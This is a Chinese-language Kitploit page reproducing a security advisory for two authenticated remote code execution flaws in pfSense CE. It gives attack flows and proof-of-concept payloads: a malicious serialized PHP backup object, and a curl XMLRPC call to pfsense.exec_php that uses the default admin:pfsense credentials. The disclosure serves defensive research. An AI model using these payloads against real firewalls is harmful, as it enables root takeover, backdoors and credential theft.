Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-69690-CVE-2025-69691 — Netgate pfSense CE 2.7.2 和 2.8.0 中的已验证 RCE(远程代码执行)漏洞 | Kitploit
工具/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试论文与研究学习与教育
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

Netgate pfSense CE 2.7.2 和 2.8.0 中的已验证 RCE(远程代码执行)漏洞

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
67个月前尚未审核
分享

🔐 CVE-2025-69690 与 CVE-2025-69691

Netgate pfSense 社区版中的已认证远程代码执行漏洞

CVE CVE CVSS Vendor Status


📋 摘要

字段详情
研究人员Nelson Adhepeau (@privlabs)
厂商Netgate
产品pfSense 社区版
受影响版本2.7.2 和 2.8.0
类型已认证远程代码执行
披露时间2026 年 2 月
厂商通知时间2025 年 12 月 2 日
CVE 分配时间2026 年 1 月 28 日

⚠️ 免责声明

本研究仅在隔离的实验环境中进行,仅供教育和安全意识宣传之用。 所有发现均已在发布前负责任地披露给厂商。本公告不构成 对生产系统发起攻击的邀请。未经授权的测试属于违法行为。


🎯 CVE-2025-69690

不安全反序列化 → 远程代码执行(pfSense CE 2.7.2)

字段值
CVSS v3.18.8(高危)
攻击向量AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502、CWE-915
攻击类型已认证(管理员)
受影响组件备份/还原机制

描述

pfSense 配置还原机制会对用户可控数据调用 unserialize(),且没有类白名单、输入验证或沙箱隔离。

精心构造的包含恶意序列化 PHP 对象的备份文件可通过 post_reboot_commands 属性注入任意命令,这些命令将通过 mwexec() 以完全 root 权限执行。

攻击流程

[攻击者] → 以管理员身份登录
           → 上传恶意 .xml 备份文件
           → 触发还原
           → pfSense 对攻击者数据调用 unserialize()
           → 通过 mwexec() 执行 post_reboot_commands
           → [获得 ROOT SHELL]

受影响组件

  • config.php — 还原处理逻辑
  • pfsense_module_installer 类 — 不安全反序列化目标
  • mwexec() — 命令执行出口

PoC 载荷

O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

影响

  • ✅ 以 root 权限执行任意系统命令
  • ✅ 安装持久化后门
  • ✅ 完全控制防火墙
  • ✅ 窃取凭据和配置信息

厂商回应

"已确认。归类为已认证管理员滥用行为。 不会发布补丁。" — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → 远程代码执行(pfSense CE 2.8.0)

字段值
CVSS v3.19.9(严重)
攻击向量AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWECWE-284、CWE-915
攻击类型已认证(远程,Basic Auth)
受影响组件XMLRPC API — pfsense.exec_php

描述

pfSense CE 2.8.0 暴露了 XMLRPC 方法 pfsense.exec_php,该方法以 root 权限执行任意 PHP 代码,且没有任何验证、沙箱或任何形式的限制。

该端点具有以下特点:

  • ✅ 默认启用
  • ✅ 可通过 HTTPS 远程访问
  • ✅ 仅受 Basic 认证保护
  • ✅ 可使用默认凭据(admin:pfsense)利用

攻击流程

[攻击者] → 向 /xmlrpc.php 发送 XMLRPC 请求
           → 使用 admin:pfsense(默认凭据)进行认证
           → 调用 pfsense.exec_php 并传入任意 PHP 代码
           → 代码以 root 身份执行,无沙箱隔离
           → [获得 ROOT SHELL]

受影响组件

  • xmlrpc.php — API 入口点
  • pfsense.exec_php — 不安全的动态代码执行
  • BasicAuth 层 — 访问控制不足

PoC

curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

影响

  • ✅ 完全远程获取 root 权限
  • ✅ 任意文件读写
  • ✅ 部署后门
  • ✅ 操纵防火墙规则
  • ✅ 提取所有凭据和配置信息

厂商回应

"已确认。归类为已认证用户的预期行为。 没有计划发布补丁。" — Netgate


📅 时间线

2025 年 11 月        →  发现漏洞
2025 年 12 月 2 日   →  向 Netgate 负责任披露
                     →  厂商确认,未计划修补
2026 年 1 月 28 日   →  MITRE 分配 CVE ID
2026 年 2 月         →  公开披露

🔗 参考资料

  • 🔴 CVE-2025-69690 在 cve.org 上
  • 🔴 CVE-2025-69691 在 cve.org 上
  • 📧 完整披露:[email protected]

👤 研究人员

Nelson Adhepeau — 独立安全研究员

LinkedIn GitHub

📧 [email protected]

下载工具